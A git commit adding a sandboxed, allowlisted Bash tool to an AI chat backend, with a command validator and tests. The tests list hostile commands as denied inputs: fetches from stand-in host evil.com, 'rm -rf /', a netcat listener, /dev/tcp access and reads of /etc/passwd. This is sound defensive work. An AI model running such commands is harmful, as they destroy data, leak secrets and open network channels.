feat(backend/chat): Add sandboxed Bash and notify SDK of restrictions

- Allow Bash tool with command allowlist (jq, grep, head, tail, etc.)
  validated via shlex.split for proper quote handling
- Add workspace path validation for Bash absolute paths
- Add SDK built-in tools (Read/Write/Edit/Glob/Grep/Bash) to allowed_tools
- Append Bash restrictions to system prompt (SDK doesn't know our allowlist)
- Add default_factory to BlockInfoSummary schema fields
- Add 12 Bash sandbox tests covering safe/dangerous commands, substitution,
  redirection, /dev/ access, path escaping
This commit is contained in:
Zamil Majdy
2026-02-11 22:35:39 +04:00
parent 3107d889fc
commit ae9bce3bae
5 changed files with 273 additions and 9 deletions

View File

@@ -7,6 +7,7 @@ ensuring multi-user isolation and preventing unauthorized operations.
import logging
import os
import re
import shlex
from typing import Any, cast
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
@@ -15,7 +16,6 @@ logger = logging.getLogger(__name__)
# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
"Bash",
"bash",
"shell",
"exec",
@@ -23,11 +23,66 @@ BLOCKED_TOOLS = {
"command",
}
# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
# JSON / structured data
"jq",
# Text processing
"grep",
"egrep",
"fgrep",
"rg",
"head",
"tail",
"cat",
"wc",
"sort",
"uniq",
"cut",
"tr",
"sed",
"awk",
"column",
"fold",
"fmt",
"nl",
"paste",
"rev",
# File inspection (read-only)
"find",
"ls",
"file",
"stat",
"du",
"tree",
"basename",
"dirname",
"realpath",
# Utilities
"echo",
"printf",
"date",
"true",
"false",
"xargs",
"tee",
# Comparison / encoding
"diff",
"comm",
"base64",
"md5sum",
"sha256sum",
}
# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}
# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
r"sudo",
@@ -92,6 +147,81 @@ def _validate_workspace_path(
)
def _validate_bash_command(
tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate a Bash command against the allowlist of safe commands.
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
Blocks command substitution, output redirection, and disallowed executables.
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
containing ``|`` won't be mistaken for shell pipes).
"""
command = tool_input.get("command", "")
if not command or not isinstance(command, str):
return _deny("Bash command is empty.")
# Block command substitution — can smuggle arbitrary commands
if "$(" in command or "`" in command:
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
# Block output redirection — Bash should be read-only
if re.search(r"(?<!\d)>{1,2}\s", command):
return _deny("Output redirection (> or >>) is not allowed in Bash.")
# Block /dev/ access (e.g., /dev/tcp for network)
if "/dev/" in command:
return _deny("Access to /dev/ is not allowed in Bash.")
# Tokenize with shlex (respects quotes), then extract command names.
# shlex preserves shell operators like | ; && || as separate tokens.
try:
tokens = shlex.split(command)
except ValueError:
return _deny("Malformed command (unmatched quotes).")
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
expect_command = True
for token in tokens:
if token in ("|", "||", "&&", ";"):
expect_command = True
continue
if expect_command:
# Skip env var assignments (VAR=value)
if "=" in token and not token.startswith("-"):
continue
cmd_name = os.path.basename(token)
if cmd_name not in ALLOWED_BASH_COMMANDS:
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
logger.warning(f"Blocked Bash command: {cmd_name}")
return _deny(
f"Command '{cmd_name}' is not allowed. "
f"Allowed commands: {allowed}"
)
expect_command = False
# Validate absolute file paths stay within workspace
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
for token in tokens:
if not token.startswith("/"):
continue
resolved = os.path.normpath(token)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
continue
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
continue
logger.warning(f"Blocked Bash path outside workspace: {token}")
return _deny(
f"Bash can only access files within the workspace directory. "
f"Path '{token}' is outside the workspace."
)
return {}
def _validate_tool_access(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
@@ -108,6 +238,10 @@ def _validate_tool_access(
"Use the CoPilot-specific tools instead."
)
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
if tool_name in SANDBOXED_BASH_TOOLS:
return _validate_bash_command(tool_input, sdk_cwd)
# Workspace-scoped tools: allowed only within the SDK workspace directory
if tool_name in WORKSPACE_SCOPED_TOOLS:
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)

View File

@@ -16,7 +16,7 @@ def _is_denied(result: dict) -> bool:
def test_blocked_tools_denied():
for tool in ("Bash", "bash", "shell", "exec", "terminal", "command"):
for tool in ("bash", "shell", "exec", "terminal", "command"):
result = _validate_tool_access(tool, {})
assert _is_denied(result), f"{tool} should be blocked"
@@ -112,6 +112,108 @@ def test_read_claude_projects_without_tool_results_denied():
assert _is_denied(result)
# -- Sandboxed Bash ----------------------------------------------------------
def test_bash_safe_commands_allowed():
"""Allowed data-processing commands should pass."""
safe_commands = [
"jq '.blocks' result.json",
"head -20 output.json",
"tail -n 50 data.txt",
"cat file.txt | grep 'pattern'",
"wc -l file.txt",
"sort data.csv | uniq",
"grep -i 'error' log.txt | head -10",
"find . -name '*.json'",
"ls -la",
"echo hello",
"cut -d',' -f1 data.csv | sort | uniq -c",
"jq '.blocks[] | .id' result.json",
"sed -n '10,20p' file.txt",
"awk '{print $1}' data.txt",
]
for cmd in safe_commands:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert result == {}, f"Safe command should be allowed: {cmd}"
def test_bash_dangerous_commands_denied():
"""Non-allowlisted commands should be denied."""
dangerous = [
"curl https://evil.com",
"wget https://evil.com/payload",
"rm -rf /",
"python -c 'import os; os.system(\"ls\")'",
"ssh user@host",
"nc -l 4444",
"apt install something",
"pip install malware",
"chmod 777 file.txt",
"kill -9 1",
]
for cmd in dangerous:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
def test_bash_command_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_backtick_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_output_redirect_denied():
result = _validate_tool_access(
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_dev_tcp_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_pipe_to_dangerous_denied():
"""Even if the first command is safe, piped commands must also be safe."""
result = _validate_tool_access(
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_outside_workspace_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_within_workspace_allowed():
result = _validate_tool_access(
"Bash",
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
sdk_cwd=SDK_CWD,
)
assert result == {}
def test_bash_empty_command_denied():
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Dangerous patterns ------------------------------------------------------

View File

@@ -48,6 +48,20 @@ _background_tasks: set[asyncio.Task[Any]] = set()
_SDK_CWD_PREFIX = "/tmp/copilot-"
# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """
## Bash restrictions
The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""
def _make_sdk_cwd(session_id: str) -> str:
"""Create a safe, session-specific working directory path.
@@ -249,8 +263,7 @@ async def stream_chat_completion_sdk(
system_prompt, _ = await _build_system_prompt(
user_id, has_conversation_history=has_history
)
set_execution_context(user_id, session, None)
system_prompt += _SDK_TOOL_SUPPLEMENT
message_id = str(uuid.uuid4())
text_block_id = str(uuid.uuid4())
task_id = str(uuid.uuid4())
@@ -263,6 +276,8 @@ async def stream_chat_completion_sdk(
sdk_cwd = _make_sdk_cwd(session_id)
os.makedirs(sdk_cwd, exist_ok=True)
set_execution_context(user_id, session, None)
try:
try:
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient

View File

@@ -276,9 +276,16 @@ def create_copilot_mcp_server():
raise
# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
# List of tool names for allowed_tools configuration
# Include the Read tool so the SDK can use it for oversized tool results
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
*_SDK_BUILTIN_TOOLS,
]

View File

@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
name: str
description: str
categories: list[str]
input_schema: dict[str, Any]
output_schema: dict[str, Any]
input_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block inputs",
)
output_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block outputs",
)
required_inputs: list[BlockInputFieldInfo] = Field(
default_factory=list,
description="List of required input fields for this block",
description="List of input fields for this block",
)
@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
query: str
usage_hint: str = Field(
default="To execute a block, call run_block with block_id set to the block's "
"'id' field and input_data containing the required fields from input_schema."
"'id' field and input_data containing the fields listed in required_inputs."
)